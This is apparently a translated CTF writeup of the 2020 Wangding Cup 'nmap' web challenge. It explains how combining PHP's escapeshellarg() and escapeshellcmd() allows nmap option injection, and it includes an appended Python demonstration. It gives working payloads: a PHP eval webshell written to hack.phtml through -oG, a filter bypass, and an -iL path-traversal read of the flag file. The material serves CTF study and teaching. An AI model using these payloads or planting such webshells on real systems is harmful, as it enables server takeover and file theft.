2020网鼎杯_朱雀组_Web_nmap
2022-07-06 09:15:00 【Her&mes】
WP (writeup)
Two things are tested:
1. how to use nmap
2. the bug that comes from using escapeshellarg() together with escapeshellcmd()
The first is easy enough; the challenge tells you.
The second, no idea; I had no clue where that was supposed to come from, and was stuck.
Other writeups point to [BUUCTF 2018]Online Tool, a code-audit challenge whose source shows outright that the parameter is passed through escapeshellarg() and then escapeshellcmd().
You can't say the two challenges test the same point, only that they are completely identical.
nmap's output-related options are what we need.
Looking them up on the nmap Chinese site gives:
-oN (normal output)
-oX (XML output)
-oS (ScRipT KIdd|3 oUTpuT)
-oG (grepable output)
-oA (output in all formats)
There are a few other miscellaneous output options worth a look; here -oG is used to build the payload.
The core of the payload is
<?php @eval($_POST["hack"]);?> -oG hack.php
But sending it only echoes back "hacker".
There is a filter. Fuzzing shows that "php" is filtered but "phtml" is not, and PHP's short tag <?= can stand in for <?php, giving:
<?= @eval($_POST["hack"]);?> -oG hack.phtml
That still does not work: after escapeshellarg() and escapeshellcmd() process this payload, no file is produced. escapeshellarg() wraps the whole string in single quotes, so the shell hands nmap one argument, "-oG hack.phtml" included, and nmap treats it as a bogus target name rather than an output option.
The fix is simple: add a space and a single quote at each end. escapeshellarg() rewrites each of those quotes as '\'' and wraps the result in quotes; escapeshellcmd() then escapes the backslashes to \\ and, because every single quote now has a partner, leaves the quotes alone. The shell collapses the leading ''\\'' into a lone \ argument, and everything after it is unquoted, with metacharacters backslash-escaped, so nmap receives -oG and hack.phtml as separate arguments. The -oG file begins with a header that records the full command line, so the <?= ... ?> tag lands in hack.phtml and PHP parses it (the shell strips the double quotes, so the file holds $_POST[hack]; PHP 7 reads the bare word as the string "hack", with the notice silenced by @, while PHP 8 throws an Error for an undefined constant).
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
For the full mechanism see the article "PHP escapeshellarg()+escapeshellcmd() 之殇".
Other writers on CSDN have also analysed escapeshellarg() and escapeshellcmd(); those posts are easy to follow.
Besides writing a webshell, the flag can be read directly with the -iL option, which makes nmap take the flag file as its target list:
' -iL ../../../../flag -o a '
Then just request a. The variant below works too, but the file to request is a':
' -iL ../../../../flag -o a
The reason is again those two functions: without the trailing quote the number of single quotes after escapeshellarg() is odd, so escapeshellcmd() escapes the final unpaired one, and the output filename that reaches nmap becomes a'.
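To make the quote arithmetic concrete, here is an added example (not from this writeup or from either challenge's source): a Python port of PHP's escapeshellarg() and escapeshellcmd() (their non-Windows code paths) plus a POSIX shell tokenizer, run over both payloads above. The `nmap ` command prefix is an assumption standing in for whatever the challenge runs; only the escaping and the resulting argv matter.

```python
"""Added example, not from the original writeup: a Python port of PHP's
escapeshellarg() and escapeshellcmd() (the non-Windows code paths) plus a
POSIX shell tokenizer, to show how escapeshellcmd(escapeshellarg($host))
turns the quote-wrapped payloads above into extra nmap arguments."""
import shlex

# Metacharacters escapeshellcmd() always prefixes with a backslash.
_CMD_META = set('#&;`|*?~<>^()[]{}$\\\n\xff')


def php_escapeshellarg(s: str) -> str:
    """escapeshellarg(): single-quote the whole string, rewriting each
    embedded ' as '\\'' so the shell sees exactly one argument."""
    return "'" + s.replace("'", "'\\''") + "'"


def php_escapeshellcmd(s: str) -> str:
    """escapeshellcmd(): backslash metacharacters; a ' or " is escaped only
    when it has no later partner (or is the other quote type inside a pair)."""
    out = []
    partner = None  # index of the quote that closes the currently open pair
    for i, c in enumerate(s):
        if c in "'\"":
            if partner is None and (nxt := s.find(c, i + 1)) != -1:
                partner = nxt        # opens a pair: left as-is
            elif partner == i:
                partner = None       # closes the pair: left as-is
            else:
                out.append("\\")     # unpaired quote: escaped
            out.append(c)
        elif c in _CMD_META:
            out.append("\\" + c)
        else:
            out.append(c)
    return "".join(out)


def nmap_args(user_input: str, double_escape: bool = True) -> list[str]:
    """Arguments nmap receives when `nmap <escaped input>` is run through a
    POSIX shell (the command prefix is an assumption; only the escaping
    matters). double_escape=False shows the safe case: escapeshellarg() alone."""
    arg = php_escapeshellarg(user_input)
    if double_escape:
        arg = php_escapeshellcmd(arg)  # the vulnerable combination
    return shlex.split("nmap " + arg, posix=True)[1:]


# The two payloads from the writeup.
WEBSHELL = "' <?= @eval($_POST[\"hack\"]);?> -oG hack.phtml '"
READ_FLAG = "' -iL ../../../../flag -o a"   # no trailing quote on purpose

if __name__ == "__main__":
    for payload in (WEBSHELL, READ_FLAG):
        print("input          :", payload)
        print("escapeshellarg :", nmap_args(payload, double_escape=False))
        print("arg+cmd (argv) :", nmap_args(payload))
```

With escapeshellarg() alone each payload comes back as a single argument, a hostname nmap simply fails to resolve. After escapeshellcmd() the webshell payload becomes `['\\', '<?=', '@eval($_POST[hack]);?>', '-oG', 'hack.phtml', '\\\\']`: -oG is now a real option, the shell has eaten the double quotes around hack, and the stray `\` and `\\` are just two more unresolvable targets. The flag payload without its trailing quote leaves the last quote unpaired, so escapeshellcmd() escapes it and the output filename becomes `a'`; appending the closing quote gives a plain `a` followed by the same harmless `\\` target.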